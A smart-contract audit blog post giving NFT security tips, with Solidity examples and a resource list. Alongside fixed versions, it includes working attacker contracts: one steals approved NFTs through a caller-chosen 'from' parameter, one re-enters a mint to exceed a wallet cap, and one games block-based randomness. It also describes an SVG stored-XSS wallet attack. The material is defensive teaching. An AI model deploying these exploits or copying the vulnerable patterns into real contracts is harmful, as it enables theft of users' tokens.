# Auditing Tips for NFT Projects

By [Officer's Blog](https://paragraph.com/@officercia) · 2023-01-24

---

**Greetings, dear readers!** We continue our [series](http://blog.pessimistic.io/) of educational articles and today we’ll study how to secure your [NFT](https://officercia.mirror.xyz/VD9IDI8b4jVBHbr5uaGcI_ev6NEKZUuuOhL9IpEfpZs) project!

In this article, I’ll give audit and development tips and collect the best-known resources into a [SoK](https://www.jsys.org/type_SoK/)!

Make sure to read the rest of the series:
-----------------------------------------

*   [Convex Finance DeFi Integration Tips](https://blog.pessimistic.io/convex-finance-defi-integration-tips-1bacfe73d3ce)
    
*   [CurveV1 Integration Tips](https://blog.pessimistic.io/curvev1-integration-tips-a49af7b4b46a)
    
*   [BalancerV1 Integration Tips](https://blog.pessimistic.io/balancerv1-integration-tips-594067785e8b)
    

> _I will also share our own observations and give some advice in the next article in our series, since our_ [_team_](http://pessimistic.io/) _has been working since 2016, we have accumulated quite a few of them._

[How to Defend Your Castle | Innovative Trio in Smart Contract Security: Monitoring, Prevention, Defense](https://blog.pessimistic.io/how-to-defend-your-castle-innovative-trio-in-smart-contract-security-monitoring-prevention-c8885304035a)

First and foremost, I would like to express our sincere gratitude to the authors of all the resource materials, and of course our [pessimistic.io](http://pessimistic.io/) auditors who have helped [me](https://officercia.mirror.xyz/) so much by revealing needed information and lifting the curtain of secrecy!

*   [Understanding Security Issues in the NFT Ecosystem](http://www.researchgate.net/publication/356339205_Understanding_Security_Issues_in_the_NFT_Ecosystem)

There have been several instances of NFT hacking and exploitation in the past, and it’s important for [NFT](https://officercia.mirror.xyz/VD9IDI8b4jVBHbr5uaGcI_ev6NEKZUuuOhL9IpEfpZs) users to be aware of these risks and take steps to protect their assets!

[Retrospective: Hacks in Web3](https://officercia.medium.com/retrospective-hacks-in-web3-cc83b8ee0e93)

**No one doubts that the foundation of any secure integration is a disciplined approach to writing code.** Consequently, this article focuses only on those aspects that are really useful for making your code safe and secure!

Therefore, below you will see not a typical article but a Systematization of Knowledge, a [SoK](https://www.jsys.org/type_SoK/), in which I rely on authors I trust in this matter and, of course, on our [**pessimistic.io**](http://pessimistic.io/) auditors! **Let’s get started!**

* * *

**By the way, here are some vacant slots in the first quarter of 2023 now so if your project needs an audit — feel free to** [**write**](http://pessimistic.io/) **to us, visit our public reports page** [**here**](https://github.com/pessimistic-io/audits)**! Let’s get in touch:** [**gm@pessimistic.io**](mailto:gm@pessimistic.io)**!**

* * *

I — We Recommend
----------------

Since our [team has been working since 2016](https://github.com/pessimistic-io/audits), we have accumulated quite a few observations, which we share below along with several pieces of security advice:

*   If the contract calls [**transferFrom** or **safeTransferFrom**](https://stackoverflow.com/a/67383742) on a user’s token, then in 99% of cases the **from** parameter must be [**msg.sender**](https://forum.openzeppelin.com/t/is-there-any-standard-to-let-msg-sender-reveal-delayed-nft/34118): users must never be allowed to supply **from** themselves. Otherwise an attacker can pass the address of any user who has already [**approved**](https://revoke.cash/) your contract (for example, for an earlier listing) and rob them! See the [transferFrom](https://veridelisi.medium.com/learn-erc20-in-solidity-transferfrom-function-ceb0a304163) semantics and the [Code4rena Cally report](https://code4rena.com/reports/2022-05-cally/).
*   [Remember](https://blog.pessimistic.io/slither-an-auditors-cornucopia-a8793ea96e67) that the **OpenZeppelin** [**ERC721**](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v4.4/contracts/token/ERC721/ERC721.sol#L389) and [**ERC1155**](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC1155/ERC1155.sol#L476) implementations call back into the recipient (**onERC721Received** / **onERC1155Received**) from [safeTransferFrom](https://stackoverflow.com/a/67383742) and **_safeMint**. That external call to a user-chosen address is a [**reentrancy**](https://blog.pessimistic.io/reentrancy-attacks-on-smart-contracts-distilled-7fed3b04f4b6) vector for *your* contract, not a bug in OpenZeppelin: update all state before the transfer (checks-effects-interactions) and add a reentrancy guard!
*   On-chain “random” values (derived from **block.timestamp**, **blockhash**, **block.prevrandao** and the like) are unreliable and **can be gamed**: a caller can compute the same value in the same transaction and revert unless the outcome suits them (e.g., to mint a specific rare NFT). Consider using [**Chainlink VRF**](https://chain.link/vrf) or a custom solution based on something like [random.org](http://random.org/) (which then requires a trusted oracle that signs the value you consume on-chain)!
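Here is an added example of the **from** problem, written for this article rather than taken from any audited project (the contract names **EscrowBase**, **VulnerableEscrow**, **SafeEscrow** and **Thief** and the 1 wei price are our own choices; the OpenZeppelin import paths are the 4.x ones). The vulnerable escrow lets the caller name **from**, so anyone who has ever approved the escrow can be listed by a stranger who is then recorded as the seller:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/token/ERC721/IERC721.sol";
import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";

/// Shared escrow logic: `_list` pulls the token from `from` and records msg.sender as seller.
abstract contract EscrowBase is IERC721Receiver {
    struct Listing { address seller; uint256 price; }

    IERC721 public immutable nft;
    mapping(uint256 => Listing) public listings;
    mapping(address => uint256) public proceeds;

    constructor(IERC721 nft_) { nft = nft_; }

    function _list(address from, uint256 tokenId, uint256 price) internal {
        require(price > 0, "price");
        listings[tokenId] = Listing(msg.sender, price);       // effects ...
        nft.safeTransferFrom(from, address(this), tokenId);   // ... before the external call
    }

    function buy(uint256 tokenId) external payable {
        Listing memory l = listings[tokenId];
        require(l.seller != address(0) && msg.value == l.price, "bad buy");
        delete listings[tokenId];
        proceeds[l.seller] += msg.value;
        // safeTransferFrom calls onERC721Received on the buyer, so every state change is done first
        nft.safeTransferFrom(address(this), msg.sender, tokenId);
    }

    function withdrawProceeds() external {
        uint256 amount = proceeds[msg.sender];
        proceeds[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send");
    }

    function onERC721Received(address, address, uint256, bytes calldata) external pure returns (bytes4) {
        return IERC721Receiver.onERC721Received.selector;
    }
}

/// VULNERABLE: the caller chooses `from`. Any wallet that once called
/// setApprovalForAll(escrow, true) can have its tokens listed by a stranger.
contract VulnerableEscrow is EscrowBase {
    constructor(IERC721 nft_) EscrowBase(nft_) {}
    function list(address from, uint256 tokenId, uint256 price) external { _list(from, tokenId, price); }
}

/// FIXED: the token can only ever be pulled from the caller.
contract SafeEscrow is EscrowBase {
    constructor(IERC721 nft_) EscrowBase(nft_) {}
    function list(uint256 tokenId, uint256 price) external { _list(msg.sender, tokenId, price); }
}

/// Attacker: lists the victim's approved token with itself as seller at 1 wei,
/// buys it for 1 wei and withdraws that wei. Net effect: the NFT is stolen for gas.
contract Thief is IERC721Receiver {
    function steal(VulnerableEscrow escrow, address victim, uint256 tokenId) external payable {
        require(msg.value == 1 wei, "need 1 wei");
        escrow.list(victim, tokenId, 1 wei);   // victim's approval is used, seller = this contract
        escrow.buy{value: 1 wei}(tokenId);     // token is now owned by this contract
        escrow.withdrawProceeds();             // the 1 wei comes straight back
    }

    function onERC721Received(address, address, uint256, bytes calldata) external pure returns (bytes4) {
        return IERC721Receiver.onERC721Received.selector;
    }

    receive() external payable {}
}
```

The only difference between the two escrows is the signature of **list**; the fix is to delete the parameter, not to validate it. Note also that **buy** finishes all bookkeeping before **safeTransferFrom**, because that call hands control to the buyer’s **onERC721Received**.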
            
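The receiver hook named in the second tip is easiest to see in a mint with a per-wallet cap. This is an added example of our own, not code from any project (the contract names **VulnerableMint**, **ReentrantMinter** and **SafeMint** are ours; OpenZeppelin 4.x paths are assumed):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

/// VULNERABLE: the per-wallet counter is bumped only after _safeMint, and
/// _safeMint calls onERC721Received on the recipient before it returns.
contract VulnerableMint is ERC721 {
    uint256 public constant MAX_PER_WALLET = 1;
    uint256 public nextId;
    mapping(address => uint256) public minted;

    constructor() ERC721("Vuln", "VULN") {}

    function mint() external {
        require(minted[msg.sender] < MAX_PER_WALLET, "wallet cap");
        _safeMint(msg.sender, nextId++);   // external call into msg.sender if it is a contract
        minted[msg.sender] += 1;           // BUG: effect after the interaction
    }
}

/// Attacker: re-enters mint() from the receiver hook. While the hook runs,
/// minted[this] is still 0, so the cap check passes on every nested call.
contract ReentrantMinter is IERC721Receiver {
    VulnerableMint public immutable target;
    uint256 public immutable want;

    constructor(VulnerableMint target_, uint256 want_) { target = target_; want = want_; }

    function attack() external { target.mint(); }

    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        // _mint has already credited this contract, so balanceOf counts the nested mints
        if (target.balanceOf(address(this)) < want) target.mint();
        return IERC721Receiver.onERC721Received.selector;
    }
}

/// FIXED: effects before interactions, with nonReentrant as a second line of defence.
contract SafeMint is ERC721, ReentrancyGuard {
    uint256 public constant MAX_PER_WALLET = 1;
    uint256 public nextId;
    mapping(address => uint256) public minted;

    constructor() ERC721("Safe", "SAFE") {}

    function mint() external nonReentrant {
        require(minted[msg.sender] < MAX_PER_WALLET, "wallet cap");
        minted[msg.sender] += 1;           // effect first ...
        _safeMint(msg.sender, nextId++);   // ... then the call that hands over control
    }
}
```

After **ReentrantMinter(target, 5).attack()** the vulnerable contract holds five tokens for a wallet whose cap is one. The guard alone would stop this particular case, because the re-entry hits the same function, but it does nothing against cross-function or cross-contract re-entry, so fix the ordering first and keep the guard as insurance.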
    
*   [Flash Crash for Cash: Cyber Threats in Decentralized Finance](http://arxiv.org/pdf/2106.10740.pdf)
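To make the randomness tip above concrete, here is an added example of our own (not taken from any project): a raffle that derives rarity from block data, a sniper contract that only completes the mint when the roll is favourable, and a two-step variant that commits the minter to a request before the random word exists. **NaiveRaffle**, **Sniper**, **VrfRaffle** and the 1% rarity threshold are our own choices; the Chainlink VRF v2 consumer base and coordinator interface are the real ones, and the confirmation count, callback gas and subscription id are deployment parameters we assume.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";
import "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";

/// VULNERABLE: "randomness" built from block data that the caller can read too.
contract NaiveRaffle is ERC721 {
    uint256 public constant RARE_ROLL = 990;   // rolls 990..999 (1%) are rare
    uint256 public nextId;
    mapping(uint256 => bool) public isRare;

    constructor() ERC721("Naive", "NAIVE") {}

    function roll(address minter) public view returns (uint256) {
        // blockhash, timestamp and prevrandao are all fixed before the tx executes
        return uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp, minter))) % 1000;
    }

    function mint() external returns (uint256 id) {
        id = nextId++;
        isRare[id] = roll(msg.sender) >= RARE_ROLL;
        _mint(msg.sender, id);
    }
}

/// Attacker: evaluates the same roll in the same transaction and reverts when it
/// would not be rare. A failed attempt costs only gas; a rare mint is guaranteed.
contract Sniper {
    function mintRare(NaiveRaffle raffle) external {
        require(raffle.roll(address(this)) >= raffle.RARE_ROLL(), "not rare, retry next block");
        raffle.mint();
    }
}

/// FIXED: two-step mint with Chainlink VRF v2. The minter is bound to a request id
/// before any random word exists; the word arrives in a separate transaction
/// from the coordinator, which the minter cannot revert or pre-compute.
contract VrfRaffle is ERC721, VRFConsumerBaseV2 {
    uint256 public constant RARE_ROLL = 990;
    VRFCoordinatorV2Interface private immutable coordinator;
    bytes32 private immutable keyHash;
    uint64 private immutable subId;
    uint256 public nextId;
    mapping(uint256 => address) public requestMinter;   // requestId => who receives the token
    mapping(uint256 => bool) public isRare;

    constructor(address coordinator_, bytes32 keyHash_, uint64 subId_)
        ERC721("VRF", "VRF") VRFConsumerBaseV2(coordinator_)
    {
        coordinator = VRFCoordinatorV2Interface(coordinator_);
        keyHash = keyHash_;
        subId = subId_;
    }

    function mint() external returns (uint256 requestId) {
        // 3 confirmations, 200k callback gas, 1 random word: assumed deployment values
        requestId = coordinator.requestRandomWords(keyHash, subId, 3, 200_000, 1);
        requestMinter[requestId] = msg.sender;          // commitment made before the roll
    }

    function fulfillRandomWords(uint256 requestId, uint256[] memory words) internal override {
        address to = requestMinter[requestId];
        require(to != address(0), "unknown request");
        delete requestMinter[requestId];
        uint256 id = nextId++;
        isRare[id] = words[0] % 1000 >= RARE_ROLL;
        // plain _mint, not _safeMint: the VRF callback must never hand control to the recipient
        _mint(to, id);
    }
}
```

The same sniping works against any scheme where the caller can evaluate the outcome inside the transaction that decides it, including **block.prevrandao** after the Merge, which the block proposer knows in advance. A commit-reveal scheme or a signed random.org value fed in by an oracle fixes the same ordering problem, but only VRF gives you a verifiable proof on-chain.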
        
    
* * *
    
II — A Tiny Tip
---------------

Keep in mind that NFTs which users add to a marketplace can be malicious themselves: the media file behind the token is stored by your platform and rendered by your front end and by every wallet that displays it!

[Video demonstration (YouTube)](https://www.youtube.com/watch?v=7hSijl1TFjA)

> _TLDR: The trick: the platform allows assets to be uploaded as files up to 40 MB in size with any of the following extensions: JPG, PNG, GIF, SVG, MP4, WEBM, MP3, WAV, OGG, GLB, GLTF._

*   [Learning Best Practices from Web Applications to Avoid Similar Security Vulnerabilities in Decentralized Applications](http://www.theseus.fi/bitstream/handle/10024/170724/Aboualy_Mahmoud_bachelor_thesis.pdf)

> _Knowing this, the experts in the video uploaded an SVG image containing malicious JavaScript code to OpenSea. When they clicked on it to open it in a new tab, they found that the file was running on a subdomain of storage.opensea.io. The researchers then added an iFrame to the image to load HTML code that would inject the window.ethereum request needed to establish a connection to the victim’s Ethereum wallet._

[https://3bodymo.medium.com/exploiting-cross-site-scripting-xss-in-web3-c8e00aeea22a](https://3bodymo.medium.com/exploiting-cross-site-scripting-xss-in-web3-c8e00aeea22a)

Scan what users upload ([1](https://www.virustotal.com/gui/home/upload), [2](https://app.any.run/), [3](http://dangerzone.rocks/); more scanners are collected [here](https://start.me/w/aJxMm0)) or use other methods of protection, such as converting untrusted files into a safe format the way [Dangerzone](http://dangerzone.rocks/) does. Be aware of stored [XSS](https://www.makeuseof.com/cross-site-scripting-attack/) (a malicious SVG persists on your storage origin and executes for every viewer) and **iframe** attacks!

*   [Follow this quality checklist before an audit](https://blog.openzeppelin.com/follow-this-quality-checklist-before-an-audit-8cc6a0e44845/)!
*   [How to not suck at an audit?](https://docs.google.com/presentation/d/1McKvyOPh7Q_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275_0_238)
*   [Solidity Audit Checklist](https://github.com/Rari-Capital/solcurity)
*   [How to read an audit report?](https://bowtiedisland.com/how-to-read-a-smart-contract-audit-report/)
*   [Best practices!](https://consensys.github.io/smart-contract-best-practices/)
*   [Smart Contract Verification Standard](http://securing.github.io/SCSVS/)

It is **very** important to mention that [**sandboxing**](https://twitter.com/apoorvlathey/status/1616566255380725770) the iframe in which untrusted NFT media is rendered also keeps the framed content from obtaining its own injected [MetaMask](https://github.com/0xngmi/metamask-extension/tree/Version-v10.22.23) (or, say, [frame.sh](http://frame.sh/)) provider instance! One caveat: if the framed document comes from the same origin as your page, do not grant the sandbox both **allow-scripts** and **allow-same-origin**, since that combination lets the framed script remove its own sandbox attribute and reload itself unrestricted.
    
    * * *
    
III — Data Sources
------------------

### NFT attack vectors:

*   [Access control on a NFT Solidity Contract](https://miguelrodrigues.org/post/nft-with-access-control/)
*   [Reentrancy Attacks on Smart Contracts Distilled](https://blog.pessimistic.io/reentrancy-attacks-on-smart-contracts-distilled-7fed3b04f4b6)
*   [Reentrancy Attacks](https://github.com/pcaversaccio/reentrancy-attacks)
*   [Approve Scam VS Sign Scam](https://officercia.mirror.xyz/Y3xDO0XlAvIzJBwNhFZnvPWLiztWxIp1KHqg-B0kKxI)
*   [NFT Attack Vectors](https://github.com/Quillhash/NFT-Attack-Vectors)
*   [How Can a Simple Signature in Metamask Drain Your Wallet?](http://typefully.com/korpi87/iHknFMq)
*   [NFT Security in Blockchain](https://quillaudits.medium.com/nft-security-in-blockchain-quillaudits-ba52d0bdfe26)
*   [NFT Anti-Hack Checklist](https://github.com/Quillhash/NFT-anti-hack-checklist)
*   [Profanity: Clarifications](https://officercia.medium.com/profanity-clarifications-df3972c8c006) (we suggest [using this safer tool instead](https://github.com/1inch/profanity2))!
*   [What’s in Your Wallet? Privacy and Security Issues in Web 3.0.](https://arxiv.org/pdf/2109.06836.pdf)
*   [Learning Best Practices from Web Applications to Avoid Similar Security Vulnerabilities in Decentralized Applications](http://www.theseus.fi/bitstream/handle/10024/170724/Aboualy_Mahmoud_bachelor_thesis.pdf)
*   [Are NFTs Safe? How to Ensure Security of Your NFTs?](https://hacken.io/discover/are-nfts-safe-how-to-ensure-security-of-your-nfts/)
### Check out:

[https://medium.com/immunefi/how-to-find-xss-vulnerabilities-in-nft-marketplaces-e190bd8cb8ad](https://medium.com/immunefi/how-to-find-xss-vulnerabilities-in-nft-marketplaces-e190bd8cb8ad)

[https://composable-security.com/blog/nft-best-practices-build-safe/](https://composable-security.com/blog/nft-best-practices-build-safe/)

[https://medium.com/cryptodevopsacademy/solidity-security-the-reentrancy-guard-pattern-c587332b1278](https://medium.com/cryptodevopsacademy/solidity-security-the-reentrancy-guard-pattern-c587332b1278)

### Research:

*   [NFT Security Ultra List](https://graph.org/NFT-security-01-28)
*   [All Known Smart Contract-side and User-side Attacks and Vulnerabilities in Web3](http://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)
*   [Vulnerabilities and Anomalies in NFT Marketplaces](https://atrium.lib.uoguelph.ca/xmlui/bitstream/handle/10214/27173/Ruan_Xiangyu_202209_MSc.pdf?sequence=2&isAllowed=y)
*   [Top NFT Incidents of all time](https://www.h-x.technology/blog/top-nft-incidents-of-all-time)
*   [The State of Crypto Security](https://thecontrol.co/the-state-of-crypto-security-d628ac5b609d)
*   [Metaverse Security and Privacy: An Overview](https://arxiv.org/pdf/2211.14948.pdf)
*   [Financial Crimes in Web3-empowered Metaverse](https://arxiv.org/pdf/2212.13452.pdf)
*   [Fusing blockchain and AI with metaverse](https://arxiv.org/pdf/2201.03201.pdf)
*   [Attacking the DeFi Ecosystem with Flash Loans for Fun and Profit](https://arxiv.org/pdf/2003.03810.pdf)
*   [NFT Wash Trading: Quantifying suspicious behaviour in NFT markets](https://arxiv.org/abs/2202.03866)
### Front-end security:

*   [Front-end Attacks](https://medium.com/beaver-smartcontract-security/defi-security-lecture-4-front-end-attack-44f32ca0cd68)
*   [Web2 Security meets Web3](https://blog.embarklabs.io/news/2020/01/30/dapp-frontend-security/index.html)
*   [DApp Security](https://mirror.xyz/0x90f2036E332dfAD451ba9E9C82366F4ba79173d8/tJf6H6wsOfOGJIdWqopK7iopcuD0NRxdmn1_de2m_Lo)
*   [Understanding Security Issues in the NFT Ecosystem](https://www.researchgate.net/publication/356339205_Understanding_Security_Issues_in_the_NFT_Ecosystem)
*   [A Survey on Metaverse: Fundamentals, Security, and Privacy](https://arxiv.org/pdf/2203.02662.pdf)

### OpSec:

*   [Security MVP from Trail-of-Bits](https://docs.google.com/document/d/1-_0Wlwch_vtkPM4F-SdEXLjQYaYT7KoPlU2rjt7tkLQ/edit)
*   [How to Defend Your Castle](https://blog.pessimistic.io/how-to-defend-your-castle-innovative-trio-in-smart-contract-security-monitoring-prevention-c8885304035a)
*   [**OpSec Guide**](https://github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap)
*   [Telegram & Discord Security Best Practices](https://officercia.mirror.xyz/dlf6ZEXq3FLE21ZY2jeJ0cBDyuZu8XIF9DEJAQ07nk8)
*   [What to do when your Web3 project Discord server is hacked & how security audit may prevent it from happening](https://officercia.mirror.xyz/x4nGX6YwhhmHj8TaQ53kBR5b5M1Ei_Y9_l1Vpext-Hk)
*   [Violent Attack Vectors in Web3: A Detailed Review](https://officercia.mirror.xyz/qfhQ_ocTPKnO5EqMlZ2ixIX7oBIfz5Tznid82EucbYk)
### Pre-Audit:

A few more small (non-binding) tasks you should complete before an audit:

1.  Prepare your technical documentation: be sure you have an architectural diagram, NatSpec and code comments;
2.  Provide an extensive unit/integration test suite;
3.  Keep a written list of protocol invariants somewhere: they are exactly what a fuzzer or a formal tool will be asked to check.
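A concrete form for items 2 and 3, as an added example of our own (not from any project): a Foundry invariant test that states two invariants for a small capped NFT and lets the fuzzer try to break them through a handler. **CappedNft**, **Handler** and the cap values are ours; the example assumes forge-std 1.x (for **bound**, **targetContract** and the assertion helpers) and OpenZeppelin 4.x.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC721/ERC721.sol";

/// Contract under test: a supply cap and a per-wallet cap (our own toy contract).
contract CappedNft is ERC721 {
    uint256 public constant MAX_SUPPLY = 100;
    uint256 public constant MAX_PER_WALLET = 2;
    uint256 public totalMinted;
    mapping(address => uint256) public minted;

    constructor() ERC721("Capped", "CAP") {}

    function mint() external {
        require(totalMinted < MAX_SUPPLY, "sold out");
        require(minted[msg.sender] < MAX_PER_WALLET, "wallet cap");
        minted[msg.sender] += 1;
        _mint(msg.sender, totalMinted++);
    }
}

/// Handler: the fuzzer calls mint() from a small pool of actors so that both caps
/// are actually reached, and records every actor so the invariants can inspect them.
contract Handler is CommonBase, StdUtils {
    CappedNft public nft;
    address[] public actors;
    mapping(address => bool) private seen;

    constructor(CappedNft nft_) { nft = nft_; }

    function mint(uint256 seed) external {
        address actor = address(uint160(bound(seed, 0x1000, 0x1032)));   // 51 possible wallets
        if (!seen[actor]) { seen[actor] = true; actors.push(actor); }
        vm.prank(actor);
        try nft.mint() {} catch {}   // reverts are expected once a cap binds
    }

    function actorCount() external view returns (uint256) { return actors.length; }
}

/// Invariants are written as protocol facts, not as scripted scenarios:
/// the fuzzer chooses the call sequences and checks them after every call.
contract CappedNftInvariants is Test {
    CappedNft private nft;
    Handler private h;

    function setUp() public {
        nft = new CappedNft();
        h = new Handler(nft);
        targetContract(address(h));
    }

    /// Invariant 1: supply never exceeds the cap.
    function invariant_supplyCap() public {
        assertLe(nft.totalMinted(), nft.MAX_SUPPLY());
    }

    /// Invariant 2: no wallet exceeds its cap, and the per-wallet counters add up to supply.
    function invariant_walletCapAndAccounting() public {
        uint256 sum;
        for (uint256 i; i < h.actorCount(); i++) {
            address a = h.actors(i);
            assertLe(nft.minted(a), nft.MAX_PER_WALLET());
            assertEq(nft.balanceOf(a), nft.minted(a));   // no transfers in this handler, so these must agree
            sum += nft.balanceOf(a);
        }
        assertEq(sum, nft.totalMinted());
    }
}
```

Run it with `forge test --match-contract CappedNftInvariants`. Swapping in the reentrancy-prone mint from the tip above and adding a contract actor whose receiver hook re-enters would make the second invariant fail, which is the point of writing invariants down before the audit rather than after.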
        
    
[https://composable-security.com/blog/threat-modeling-for-smart-contracts-best-step-by-step-guide/](https://composable-security.com/blog/threat-modeling-for-smart-contracts-best-step-by-step-guide/)
    
[https://docs.google.com/presentation/d/1McKvyOPh7Q_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275_0_238](https://docs.google.com/presentation/d/1McKvyOPh7Q_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275_0_238)
    
Thank you!
----------

* * *

We hope that this article was informative and useful for you! Thank you for reading!

_What instruments should we review? What would you be interested in reading about?_

* * *

Support is **very** important to me, with it I can do what I love — educating users!

*   [Check out my GitHub](https://github.com/OffcierCia/)
*   [Follow my Twitter](https://twitter.com/officer_cia)
*   [Track all my activities](https://start.me/p/QRg5ad/officercia)
*   [All my Socials](https://linktr.ee/officercia)
*   [Join my TG channel](https://t.me/officer_cia)

[https://github.com/OffcierCia/support](https://github.com/OffcierCia/support)

If you want to support my work, you can send me a donation to the address:

*   [**0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A**](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A) or [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth) — ETH, BSC, Polygon, Optimism, Zk, Fantom, etc
*   [**17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU**](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU) — BTC
*   **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds — Monero XMR**
*   [DeFi Roadmap grant page](https://gitcoin.co/grants/3150/defi-web3-developer-roadmap)

[https://officercia.medium.com/if-you-have-been-scammed-9ce21ee120e6](https://officercia.medium.com/if-you-have-been-scammed-9ce21ee120e6)

Stay safe!
----------

---

*Originally published on [Officer's Blog](https://paragraph.com/@officercia/auditing-tips-for-nft-projects)*
